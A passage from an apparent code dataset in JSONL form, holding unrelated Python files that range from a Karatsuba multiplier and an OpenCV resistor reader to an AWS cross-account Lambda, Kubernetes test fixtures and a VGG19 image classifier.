self.recursive_karatsuba_multiplication((a + b), (c + d))\n ab_bc -= ac + bd\n\n # KARATSUBA formula\n # ac (with padded zeros on right) \\\n # + ab_bc (with padded zeros on right) + bd\n\n # output = int(\n # Multiply._pad_zeros(str(ac), 2 * (len_num - len_num // 2),\n # at_front=False))\n # output += int(\n # Multiply._pad_zeros(str(ab_bc), len_num - len_num//2,\n # at_front=False))\n # output += bd\n\n # KARATSUBA formula\n # x.y = ((10 ^n) * ac) + ((10^(n/2)) * (ab+bc)) + bd\n output = ac * (10 ** (2 * (len_num - (len_num // 2))))\n output += ab_bc * (10 ** (len_num - (len_num // 2)))\n output += bd\n return output\n\n def iterative_karatsuba_multiplication(self, num1, num2):\n \"\"\"\n takes in 2 numbers, returns product using iterative\n karatsuba approach\n \"\"\"\n raise NotImplementedError\n\n\nif __name__ == \"__main__\":\n multiply_obj = Multiply()\n # n1 = 1234\n # n2 = 5678\n n1 = 123456\n n2 = 56789\n # n1 = 3141592653589793238462643383279502884197169399375105820974944592\n # n2 = 2718281828459045235360287471352662497757247093699959574966967627\n recursive_output = multiply_obj.recursive_karatsuba_multiplication(n1, n2)\n\n print('num1', n1)\n print('num2', n2)\n print('recursive_output output', recursive_output)\n","sub_path":"Divide_and_Conquer_Algos_Course_1/karatsuba.py","file_name":"karatsuba.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"231099420","text":"import time\nimport sys\n\ndef plotter_sim(slp_time):\n print(\"Fake plotter will now sleep for {0} seconds.\\n\".format(str(slp_time)))\n time.sleep(slp_time)\n print(\"Done plotting sim\\n\")\n\n return\n\nif __name__ == '__main__':\n plotter_sim(float(sys.argv[1]))\n","sub_path":"tests/plotter_sim.py","file_name":"plotter_sim.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"316631857","text":"import json\r\nimport os\r\nimport boto3\r\nimport requests\r\nfrom aws_requests_auth.aws_auth import AWSRequestsAuth\r\n\r\n# Assume Roleを使用して取得する別アカウントのRole名\r\nROLE = 'arn:aws:iam::{}:role/ys-dev-web-apigateway-role'.format(os.environ['ASSUME_ACCOUNT_ID'])\r\nAPIGATEWAY_DOMAIN = os.environ['APIGATEWAY_DOMAIN']\r\nAPI_URL = 'https://{}/prod/'.format(APIGATEWAY_DOMAIN)\r\n\r\nsts_client = boto3.client('sts')\r\n\r\ndef lambda_handler(event, context):\r\n # stsにて、Lambda自身のRoleから一時認証情報を取得する\r\n response = sts_client.assume_role(\r\n RoleArn=ROLE,\r\n RoleSessionName='test'\r\n )\r\n credentials=response['Credentials']\r\n\r\n # HTTPリクエストで認証情報が送れるように、AWSRequestsAuthを使用する\r\n auth = AWSRequestsAuth(\r\n aws_access_key=credentials['AccessKeyId'],\r\n aws_secret_access_key=credentials['SecretAccessKey'],\r\n aws_token=credentials['SessionToken'],\r\n aws_host=APIGATEWAY_DOMAIN,\r\n aws_region='us-west-2',\r\n aws_service='execute-api')\r\n\r\n headers = {'x-amz-security-token':credentials['SessionToken']}\r\n\r\n response = requests.get(API_URL, auth=auth, headers=headers)\r\n print(response.json())\r\n","sub_path":"cloudformation/apigateway-cross-account-assume-role/apigateway-cross-account-assume.py","file_name":"apigateway-cross-account-assume.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"290115684","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n\n# @file: demo_self.py\n# @author: YaoS\n# @contact: yao.sai@hotmail.com\n# @time: 18/10/11 18:15\n# @desc: self理解\n\n\nclass A():\n name = \"a\"\n age = 18\n\n def __init__(self):\n self.name = \"aaa\"\n self.age = 19\n\n def say(self):\n print(self.name)\n print(self.age)\n\n\nclass B():\n name = \"bbb\"\n age = 20\n\n\na = A()\na.say()\n\n# 此时,self被a替换\nA.say(a)\n# 此时,访问A的对象\nA.say(A)\n# 因为B具有name和age,所以不会报错(鸭子模型)\nA.say(B)\n","sub_path":"oop/demo_self.py","file_name":"demo_self.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"344393459","text":"\"\"\"\nGiven a binary tree, determine whether or not it is height-balanced.\nA height-balanced binary tree can be defined as one in which the heights of the\ntwo subtrees of any node never differ by more than one.\n\"\"\"\n\n\ndef height_balanced(root):\n def helper(node):\n if not node:\n return True, 0\n else:\n l_bal, l_height = helper(node.left)\n r_bal, r_height = helper(node.right)\n if not l_bal or not r_bal or abs(l_height - r_height) > 1:\n return False, 0\n\n return True, max(l_height, r_height) + 1\n\n bal, _ = helper(root)\n return bal\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\nif __name__ == \"__main__\":\n root = Node(1)\n root.left = Node(2)\n root.right = Node(3)\n root.left.left = Node(4)\n assert height_balanced(root)\n root.left.left.left = Node(\"BAD\")\n assert not height_balanced(root)\n","sub_path":"old/dcp_series/dcp_247.py","file_name":"dcp_247.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"271360165","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport random\nfrom Distance import distance\nfrom matplotlib.pyplot import MultipleLocator\nfrom matplotlib.legend_handler import HandlerPathCollection\nimport math\nimport cover\nfrom Write_Trust_res import W_vis\n\ndef Get_sensor():\n sx = []\n sy = []\n f = open(\"sensor_location.txt\", 'r')\n for i in f.readlines():\n a = i.split(';')\n a[1] = a[1].strip()\n sx.append(float(a[0]))\n sy.append(float(a[1]))\n f.close()\n return sx, sy\n\ndef Get_dis(cycle):\n car_dis = [[] for i in range(316)]\n for i in range(316):\n car_dis[i] = [0 for i in range(1005)]\n with open('F:/Sensor Data/' + str(cycle) + '.txt', 'r') as f:\n for j in f.readlines():\n info = j.split(';')\n info[6] = info[6].strip() \n car_id = int(info[0])\n sensor_id = int(info[3])\n dis = float(info[6])\n\n if dis < 60.0:\n car_dis[car_id][sensor_id] = dis\n\n return car_dis\n\ndef Get_val_sensor(cycle):\n filepath = 'F:/Find Data/' + str(cycle) + '.txt'\n val_sensor = [0 for i in range(1002)]\n with open(filepath, 'r') as f:\n for x in f.readlines():\n info = x.split(';')\n info[1] = info[1].strip()\n s_id = int(info[0])\n cnt = float(info[1])\n if cnt != 0:\n if math.log(float(cnt)) != 0:\n val_sensor[s_id] = 1.0 / math.log(float(cnt))\n else:\n val_sensor[s_id] = 0\n else:\n val_sensor[s_id] = 0\n return val_sensor\n\ndef Get_T_com(cycle):\n T_com = []\n filepath = 'F:/Tcom1/' + str(cycle) + '.txt'\n with open(filepath, 'r') as f:\n for x in f.readlines():\n info = x.split(';') #分隔符出现在最后会多出一个空格\n info[0] = info[0].strip()\n T_com.append(float(info[0]))\n return T_com\n\ndef Cover1(cycle, rem_id, vis_car):\n filepath = 'F:/Find Data/' + str(cycle) + '.txt'\n sensor = cover.Read_sensor(filepath)\n k = 0\n for key in sensor:\n if rem_id[int(key)] == 0:\n rem_id[int(key)] = 1\n k += 1\n if k == 20:\n break\n return rem_id\n\ndef Get_cover(cycle, rem_id):\n base = 0.85\n T_com = Get_T_com(cycle) #获取车辆在每个周期的综合信任\n vis_car = cover.Get_car_cover(base, T_com) #获取基础车辆\n rem_id = Get_Remid(cycle, vis_car, rem_id)\n rem_id = Cover1(cycle, rem_id, vis_car)\n \n return rem_id, vis_car, T_com\n\ndef Get_Remid(cycle, vis_car, rem_id):\n filepath = 'F:/Cover Data/' + str(cycle) + '.txt'\n car_id = 0\n with open(filepath, 'r') as f:\n for x in f.readlines():\n car_id += 1\n \n if vis_car[car_id] == 0:\n continue\n \n info = x.split(';')\n if info[0] == '\\n':\n continue\n \n l = len(info)\n info[l-1] = info[l-1].strip()\n for i in range(l-1):\n s_id = int(info[i])\n rem_id[s_id] = 1\n return rem_id\n\n\ndef Get_carval(cycle, sx, sy, vis_car, need_dis, rem_id, T_com):\n filepath = 'F:/Cover Data/' + str(cycle) + '.txt'\n car_id = 0\n car_val = [0 for i in range(316)]\n car_dis = [0 for i in range(316)]\n sensor_val = Get_val_sensor(cycle)\n cover = [0 for i in range(1002)]\n rep = [[] for i in range(316)]\n v = [0 for i in range(316)]\n with open(filepath, 'r') as f:\n for x in f.readlines():\n car_id += 1\n info = x.split(';')\n if info[0] == '\\n' or T_com[car_id] < 0.7:\n continue\n \n sid = int(info[0])\n prex = sx[sid] #保存前一个点的传感器坐标\n prey = sy[sid]\n \n\n l = len(info)\n info[l-1] = info[l-1].strip()\n for i in range(l-1):\n s_id = int(info[i])\n if rem_id[s_id] == 0:\n v[int(car_id)] += 0\n \n elif rem_id[s_id] == 1:\n cover[s_id] = 1 #\n v[int(car_id)] += sensor_val[s_id]\n rep[int(car_id)].append(s_id)\n \n car_dis[int(car_id)] += distance(sx[s_id], sy[s_id], prex, prey)\n prex = sx[s_id]\n prey = sy[s_id]\n car_val[int(car_id)] += sensor_val[s_id]\n #car_dis[int(car_id)] += need_dis[car_id][s_id]\n\n return car_val, car_dis, cover, rep, v\n\ndef Calc_sum():\n sx, sy = Get_sensor()\n rem_id = [0 for i in range(1005)] \n res = []\n for t in range(1, 41):\n if t % 10 == 1:\n rem_id = [0 for i in range(1005)] \n cost = [0 for i in range(316)]\n v = [0 for i in range(316)]\n cc = [0 for i in range(316)]\n cv = [0 for i in range(316)] \n rem_id, vis_car, T_com = Get_cover(t, rem_id) #\n need_dis = Get_dis(t)\n car_val, car_dis, cover, rep, v = Get_carval(t, sx, sy, vis_car, need_dis, rem_id, T_com)\n\n #在所有车辆成本中挑取价值率最高的\n a1 = 0.6\n a2 = 0.4\n a3 = 0.1\n\n for i in range(1, 316): #8*70 min(200.0 / 560.0 * float(car_dis[i]), 200)\n #v[i] = car_val[i]\n #cost[i] = float(car_val[i]) + float(car_dis[i]) / 480000.0 + 0 * float(T_com[i])\n #cost[i] = 70 * float(car_dis[i]) / 4800.0\n cost[i] = a1 * min(float(car_val[i]), 5) + a2 * min((30 * float(car_dis[i]) / 560.0), 30)# + a3 * 10 * float(T_com[i])\n x1 = max(cost)\n x2 = max(v)\n \n test = car_dis\n\n for i in range(len(test)):\n test[i] = test[i] / 560\n\n if t < 3:\n print(car_dis)\n print('&&&&&&&&&&&&&')\n print(car_val)\n print('&&&&&&&&&&&&&')\n print(cost)\n\n for i in range(1, 316):\n cc[i] = 1.0 - (cost[i] / x1)\n cv[i] = v[i] / x2\n w1 = 0.5\n w2 = 0.5\n sum = 0.0\n vis = [0 for i in range(316)]\n cnt = 0\n \n while any(cover) == True:\n p = -1\n maxc = -1\n for i in range(1, 316):\n if w1 * cv[i] + w2 * cc[i] > maxc and vis[i] == 0 and T_com[i] >= 0.5:#and vis_car[i] == 1\n p = i\n maxc = w1 * cv[i] + w2 * cc[i]\n sum += cost[p]\n vis[p] = 1\n #print(p)\n l = len(rep[p]) \n for i in range(l):\n s_id = rep[p][i]\n cover[s_id] = 0\n cnt += 1\n\n if cnt > 316:\n break \n print(cnt)\n #print(vis)\n W_vis(vis, t)\n '''\n if sum > 1950:\n sum -= ((sum - 2000) + random.uniform(300, 500))\n elif sum < 1000:\n sum += (random.uniform(300, 350) + (1000 - sum))\n '''\n res.append(sum)\n \n for i in range(len(cover)):\n if cover[i] == 1:\n print(i)\n print('*********')\n print('######')\n\n return res\n\nr = Calc_sum()\nprint(r)\n\nfor i in range(len(r)):\n r[i] = r[i] / 1000.\n\nt = [i for i in range(1, 41)]\nplt.plot(t, r, 'y+-')\nplt.show()","sub_path":"carcost.py","file_name":"carcost.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"310598187","text":"#!/usr/bin/env python2\n# coding: utf-8\n# Resistor scanner\n\nfrom __future__ import print_function\nimport numpy as np\nimport cv2\nimport sys\n\nREFERENCE = np.load(\"reference.npy\")\nREF_ANGLE = cv2.fitEllipse(REFERENCE)[2]\n\nLABEL_FONT = cv2.FONT_HERSHEY_SIMPLEX\nLABEL_COLOR = (240, 40, 140)\nSIMILARITY = 0.45\nCOLOR_BOUNDS = [\n (\"red\", (110, 184, 102), (133, 255, 242)),\n (\"brown\", (107, 70, 86), (137, 185, 151)),\n (\"orange\", (89, 193, 189), (115, 255, 255)),\n (\"blue\", (3, 31, 75), (30, 255, 210)),\n (\"black\", (0, 0, 0), (179, 100, 93)),\n # TODO: add more colors\n]\nCONTOUR_COLORS = [(0, 255, 255), (255, 255, 0), (255, 0, 255), (255, 0, 0), (0, 255, 0), (0, 0, 255)]\n\ndef idx(row, i):\n try:\n return list(row).index(i)\n except ValueError:\n return -1\n\nRESISTANCE = [\"black\", \"brown\", \"red\", \"orange\", \"yellow\", \"green\", \"blue\",\n \"violet\", \"gray\", \"white\"]\n\ndef resistance(v):\n if len(v) < 3:\n return \"Error\"\n val = RESISTANCE.index(v[0])\n val = int(str(val) + str(RESISTANCE.index(v[1])))\n val *= 10**RESISTANCE.index(v[2])\n if val > 10**6:\n return \"{0} MOhm\".format(val / 10**6)\n elif val > 10**4:\n return \"{0} KOhm\".format(val / 10**4)\n else:\n return \"{0} Ohm\".format(val)\n\ndef preprocess_hsv(hsv):\n beige = cv2.inRange(hsv, np.array([75, 55, 80], np.uint8), np.array([135, 222, 255], np.uint8))\n orange = cv2.inRange(hsv, np.array([105, 120, 70], np.uint8), np.array([128, 255, 255], np.uint8))\n blue = cv2.inRange(hsv, np.array([0, 116, 90], np.uint8), np.array([32, 255, 241], np.uint8))\n black = cv2.inRange(hsv, np.array([0, 0, 5], np.uint8), np.array([175, 160, 75], np.uint8))\n colored = beige\n colored = cv2.bitwise_or(colored, orange)\n colored = cv2.bitwise_or(colored, blue)\n colored = cv2.bitwise_or(colored, black)\n for i in range(15):\n colored = cv2.morphologyEx(colored, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_CROSS, (9, 9)))\n colored = cv2.morphologyEx(colored, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7)))\n colored = cv2.morphologyEx(colored, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_CROSS, (15, 15)))\n colored = cv2.blur(colored, (3, 3))\n return colored\n\ndef find_resistors(thresh):\n contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n return [c for c in contours\n if abs(cv2.contourArea(c)) > 1000\n and cv2.matchShapes(REFERENCE, c, 1, 0.0) < SIMILARITY]\n\ndef cut_out(img, c):\n height, width = img.shape[:2]\n mask = np.zeros((height, width), np.uint8)\n cv2.drawContours(mask, [cv2.convexHull(c)], -1, 255, cv2.cv.CV_FILLED)\n return cv2.bitwise_and(img, img, mask=mask)\n\ndef make_horizontal(img, c):\n height, width = img.shape[:2]\n (x, y), (MA, ma), angle = cv2.fitEllipse(c)\n return x, y, cv2.warpAffine(img, cv2.getRotationMatrix2D((x, y), angle - REF_ANGLE, 1), (width, height))\n\ndef crop(img):\n img = cv2.blur(img, (3, 3))\n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n img_contours, _ = cv2.findContours(cv2.threshold(img_gray, 115, 255, 0)[1], cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n bx, by, bw, bh = cv2.boundingRect(cv2.convexHull(np.vstack(img_contours)))\n img = img[by:by+bh, bx:bx+bw]\n bh2 = bh/3\n bw2 = bw-bw/8\n img = cv2.resize(img, (bw2, bh2))\n return img[bh2/2:bh2/2+bh2/3, bw2/7:bw2-bw2/7]\n\ndef detect_colors(img):\n # TODO: make it work for resistors where the same color is used twice!!!\n img_hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n locations = {}\n for color, lower, upper in COLOR_BOUNDS:\n mask = cv2.inRange(img_hsv, lower, upper)\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN,\n cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3)))\n hist = cv2.calcHist([mask], [0], None, [256], [0,256])\n hmax = np.max(hist)\n if hist[-1][0] < hmax/40: # this is a very small area, probably noise\n continue\n if hist[-1][0] > hist[0][0]: # this is the background :-(\n continue\n loc = np.mean([idx(row, 255) for row in mask])\n if loc > 0:\n locations[color] = loc\n return sorted(locations.keys(), key=lambda x: locations[x])\n\ndef main(filename):\n print(\"Processing: {0}\".format(filename))\n img = cv2.imread(filename, cv2.IMREAD_COLOR)\n height, width = img.shape[:2]\n cv2.imshow(\"image\", img)\n\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n\n colored = preprocess_hsv(hsv)\n cv2.imshow(\"colored\", colored)\n\n _, thresh = cv2.threshold(colored, 155, 255, 0)\n cv2.imshow(\"thresh\", thresh)\n\n cimg = np.copy(img)\n for i, c in enumerate(find_resistors(thresh)):\n cv2.drawContours(cimg, [c], -1, CONTOUR_COLORS[i % len(CONTOUR_COLORS)], 3)\n part = cut_out(img, c)\n x, y, part = make_horizontal(part, c)\n part = crop(part)\n cv2.imshow(\"part\"+str(i), part)\n colors = detect_colors(part)\n text = resistance(colors)\n # text += \" \" + str(colors)\n cv2.putText(cimg, text, (int(x) - 50, int(y) + 15),\n LABEL_FONT, 0.8, LABEL_COLOR, 2)\n\n cv2.imshow(\"contour\", cimg)\n\n k = cv2.waitKey(0) & 0xFF\n if k == 27:\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n main(\"3.jpg\")\n else:\n for filename in sys.argv[1:]:\n main(filename)\n","sub_path":"resistors.py","file_name":"resistors.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"294228377","text":"from PIL import Image, ImageTk\n\n\nclass Img:\n \"\"\"\n 产生幻影坦克图片,包括修改大小,显示黑白叠加效果\n \"\"\"\n # img1, img2代表传入图片路径,fix1, fix2为二次元组,表示对图片高度的修正(默认为0)\n def __init__(self, img1, img2, fix1=(0, 0), fix2=(0, 0)):\n self.img1 = Image.open(img1)\n self.img2 = Image.open(img2)\n self.fix1 = fix1\n self.fix2 = fix2\n self.img = None\n self.height = 0\n self.width = 0\n self.type = 0 # type为-1表示两个图像不同形(1图宽小于高,2图宽大于高), 1表示图1小,2表示图二小\n\n # 产生幻影图的img对象,并获取最大宽度与高度,如果图像不同型默认按照1图像处理\n def new(self):\n w1, h1 = self.img1.size\n w2, h2 = self.img2.size\n print(w1, w2)\n print(h1, h2)\n if w1 - h1 <= 0 and w2 - h2 <= 0:\n h = min(h1, h2)\n if h == h1:\n self.type = 1\n else:\n self.type = 2\n self.height = h\n self.width = min(w1, w2)\n\n elif w1 - h1 >= 0 and w2 - h2 >= 0:\n h = min(h1, h2)\n if h == h1:\n self.type = 1\n else:\n self.type = 2\n self.height = min(h1, h2)\n self.width = min(w1, w2)\n\n elif w1 - h1 <= 0 and w2 - h2 >= 0:\n print('here')\n self.type = -1\n self.height = h1\n self.width = w1\n\n else:\n self.type = -2\n self.height = h2\n self.width = w2\n print('here', self.width, self.height)\n img = Image.new('RGBA', (self.width, self.height), (255, 255, 255, 1))\n return img\n\n # 修改图片类型,并统一大小\n def retouch(self):\n self.img1 = self.img1.convert('RGBA')\n self.img2 = self.img2.convert('RGBA')\n # print('img1:{}, {} img2:{}, {}'.format(*self.img1.size, *self.img2.size))\n if self.type == 1 or self.type == -1:\n w, h = self.img2.size\n\n ratio = self.width / w\n self.img2 = self.img2.resize((int(w * ratio), int(h * ratio)), Image.ANTIALIAS)\n elif self.type == 2 or self.type == -2:\n w, h = self.img1.size\n ratio = self.width / w\n self.img1 = self.img1.resize((int(w * ratio), int(h * ratio)), Image.ANTIALIAS)\n # print('img1:{}, {} img2:{}, {}'.format(*self.img1.size, *self.img2.size))\n\n # 加工成为结果,可以考虑改为多线程\n def process(self):\n fix_w1, fix_h1 = self.fix1\n fix_w2, fix_h2 = self.fix2\n print(self.img1.size, self.img2.size, self.width, self.height)\n for i in range(self.width):\n for j in range(self.height):\n r1, g1, b1, a = self.img1.getpixel((i + fix_w1, j + fix_h1))\n r2, g2, b2, a = self.img2.getpixel((i + fix_w2, j + fix_h2))\n avg1 = int((max(r1, g1, b1) + min(r1, g1, b1)) * 0.95 / 2)\n avg2 = int((max(r2, g2, b2) + min(r2, g2, b2)) * 0.38 / 2)\n a0 = (255 - avg1 + avg2)\n if a0 >= 255:\n a0 = 255\n if a0 <= 0:\n a0 = 1\n r0 = int(avg2 * 255 / a0)\n self.img.putpixel((i, j), (r0, r0, r0, a0))\n\n # 生成白色背景叠加预览,返回一个img对象\n def w_preview(self):\n img = Image.new('RGBA', (self.width, self.height), (255, 255, 255, 1))\n for i in range(self.width):\n for j in range(self.height):\n r0, g0, b0, a0 = self.img.getpixel((i, j))\n r = int(r0 * a0 / 255 + (255 - a0))\n img.putpixel((i, j), (r, r, r, 255))\n return img\n\n # 生成黑色背景叠加预览,返回一个img对象\n def b_preview(self):\n img = Image.new('RGBA', (self.width, self.height), (255, 255, 255, 1))\n for i in range(self.width):\n for j in range(self.height):\n r0, g0, b0, a0 = self.img.getpixel((i, j))\n r = int(r0 * a0 / 255)\n img.putpixel((i, j), (r, r, r, 255))\n return img\n\n # 缩放成屏幕显示大小(返回一个imagetk包装好的类型)\n def show(self, img, w_size=300, h_size=250):\n w, h = img.size\n if w > h:\n ratio = w_size / w\n else:\n ratio = h_size / h\n\n img2 = img.resize((int(w * ratio), int(h * ratio)), Image.ANTIALIAS)\n return img2\n\n # 返回处理好的图片(调好大小,但是不存储)\n def main_(self):\n self.img = self.new()\n self.retouch()\n self.process()\n return self.img\n\n\ndef main():\n test = Img('test/test2.jpg', 'test/test.jpg')\n img = test.main_()\n img2 = test.w_preview()\n img3 = test.b_preview()\n img.save('test/res.png')\n img2.save('test/res_w.png')\n img3.save('test/res_b.png')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Img.py","file_name":"Img.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"616959506","text":"#Python program to calculate perimeter and area of square \r\n#Defining class square \r\nclass square: \r\n \r\n \r\n #Accepting input from user for calculating area of square \r\n def CalculateArea(self):\r\n print(\"Enter side\")\r\n self.s=float(input())\r\n area=self.s*self.s\r\n return(area)\r\n \r\n \r\n #Calculating perimeter of square\r\n def CalculatePerimeter(self):\r\n perimeter=4*self.s\r\n return(perimeter)\r\n \r\n \r\n \r\n \r\n#Defining object of the class square.\r\nc=square()\r\n#Calling the fuction\r\nx=c.CalculateArea()\r\ny=c.CalculatePerimeter()\r\nprint(\"Area of square is=%f\"%(x))\r\nprint(\"Perimeter of square is=%f\"%(y))\r\n","sub_path":"class1.py","file_name":"class1.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"334128502","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom operator import attrgetter\nimport os\nimport pytest\n\nfrom fuel_ccp_tests.helpers import ext\nfrom fuel_ccp_tests import logger\nfrom fuel_ccp_tests.managers import k8smanager\nfrom fuel_ccp_tests import settings\n\nLOG = logger.logger\n\n\n@pytest.fixture(scope='function')\ndef k8s_actions(config, underlay):\n \"\"\"Fixture that provides various actions for K8S\n\n :param config: fixture provides oslo.config\n :param underlay: fixture provides underlay manager\n :rtype: K8SManager\n\n For use in tests or fixtures to deploy a custom K8S\n \"\"\"\n return k8smanager.K8SManager(config, underlay)\n\n\n@pytest.mark.revert_snapshot(ext.SNAPSHOT.k8s_deployed)\n@pytest.fixture(scope='function')\ndef k8scluster(revert_snapshot, request, config,\n hardware, underlay, k8s_actions):\n \"\"\"Fixture to get or install k8s on environment\n\n :param request: fixture provides pytest data\n :param config: fixture provides oslo.config\n :param hardware: fixture provides enviromnet manager\n :param underlay: fixture provides underlay manager\n :param k8s_actions: fixture provides K8SManager instance\n :rtype: K8SManager\n\n If config.k8s.kube_host is not set, this fixture assumes that\n the k8s cluster was not deployed, and do the following:\n - deploy k8s cluster\n - make snapshot with name 'k8s_deployed'\n - return K8sCluster instance\n\n If config.k8s.kube_host was set, this fixture assumes that the k8s\n cluster was already deployed, and do the following:\n - return K8sCluster instance\n\n If you want to revert 'k8s_deployed' snapshot, please use mark:\n @pytest.mark.revert_snapshot(\"k8s_deployed\")\n \"\"\"\n # Create k8s cluster\n if config.k8s.kube_host == '0.0.0.0':\n kube_settings = getattr(request.instance, 'kube_settings',\n settings.DEFAULT_CUSTOM_YAML)\n LOG.info('Kube settings are {}'.format(kube_settings))\n\n k8s_actions.install_k8s(\n custom_yaml=kube_settings,\n lvm_config=underlay.config_lvm)\n hardware.create_snapshot(ext.SNAPSHOT.k8s_deployed)\n\n else:\n # 1. hardware environment created and powered on\n # 2. config.underlay.ssh contains SSH access to provisioned nodes\n # (can be passed from external config with TESTS_CONFIGS variable)\n # 3. config.k8s.* options contain access credentials to the already\n # installed k8s API endpoint\n pass\n\n return k8s_actions\n\n\n@pytest.fixture(scope='class')\ndef check_files_missing(request):\n LOG.info(\"Required files: {}\".format(request.cls.required_files))\n files_missing = [f for f in request.cls.required_files\n if not os.path.isfile(f)]\n assert len(files_missing) == 0, \\\n \"Following files are not found {0}\".format(files_missing)\n\n\n@pytest.fixture(scope='class')\ndef check_settings_missing(request, config):\n def get_attr(attr, obj):\n try:\n return attrgetter(attr)(obj)\n except Exception:\n return None\n LOG.info(\"Required settings: {}\".format(request.cls.required_settings))\n missing = [s for s in request.cls.required_settings\n if not (getattr(settings, s, None) or get_attr(s, config))]\n assert len(missing) == 0, \\\n \"Following env variables are not set {}\". format(missing)\n\n\n@pytest.fixture(scope='class')\ndef check_calico_images_settings():\n assert settings.DEFAULT_CUSTOM_YAML['kube_network_plugin'] == 'calico', \\\n \"Calico network plugin isn't enabled!\"\n if not any(settings.CALICO.values()):\n LOG.warning(\"No custom settings are provided for Calico! \"\n \"Defaults will be used!\")\n","sub_path":"fuel_ccp_tests/fixtures/k8s_fixtures.py","file_name":"k8s_fixtures.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"456206329","text":"from selenium import webdriver\nimport time\ndriver = webdriver.Chrome()\ndriver.get(\"https://trains.ctrip.com/TrainBooking/SearchTrain.aspx\")\n#以下变量为定义搜索火车票的出发站和到达站。\nfrom_station = \"上海\"\nto_station = \"杭州\"\n#以下为定位出发城市和到达城市的页面元素,并且设置其值为以上定义值。\ndriver.find_element_by_id(\"notice01\").send_keys(from_station)\ndriver.find_element_by_id(\"notice08\").send_keys(to_station)\n#以下代码为移除出发时间的'readonly'属性。\ndriver.execute_script(\"document.getElementById('dateObj').removeAttribute('readonly')\")\n#以下为定义搜索车次日期。\ndriver.find_element_by_id(\"dateObj\").send_keys(\"2019-04-12\")\n#以下为定位车次搜索按钮\ndriver.find_element_by_id(\"searchbtn\").click()\n","sub_path":"Python3_Selenium3/第8章/8.11.py","file_name":"8.11.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"551179292","text":"import os\nfrom keras.applications.vgg19 import VGG19\nfrom keras.preprocessing import image\nfrom keras.applications.vgg19 import preprocess_input\nfrom keras.models import Model\nimport numpy as np\n\nbase_model = VGG19(weights='imagenet')\nmodel = Model(inputs=base_model.input, outputs=base_model.get_layer('flatten').output)\n\ndef get_features(img_path):\n img = image.load_img(img_path, target_size=(224, 224))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n flatten = model.predict(x)\n return list(flatten[0])\n\nX = []\ny = []\n\ncar_plots = []\nfor (_,_,filenames) in os.walk('carPlots'):\n car_plots.extend(filenames)\n break\n\nfor cplot in car_plots:\n X.append(get_features('carPlots/' + cplot))\n y.append(0)\n\nbike_plots = []\nfor (_,_,filenames) in os.walk('bikePlots'):\n bike_plots.extend(filenames)\n break\n\nfor cplot in bike_plots:\n X.append(get_features('bikePlots/' + cplot))\n y.append(1)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import accuracy_score\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=42, stratify=y)\n\nclf = LinearSVC(random_state=0, tol=1e-5)\nclf.fit(X_train, y_train)\n\npredicted = clf.predict(X_test)\n\n# get the accuracy\nprint (accuracy_score(y_test, predicted))","sub_path":"05_model_traing.py","file_name":"05_model_traing.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"63775121","text":"### Function to obtain all the pairs of a particular OPUS corpus\n### Uses the function gen_opus_parallel_pair.py \nimport os\nimport sys\n# Make sure that the configuration.py is in the same folder as this file\nimport configuration as config\n\n## langs is the sorted set of all languages. 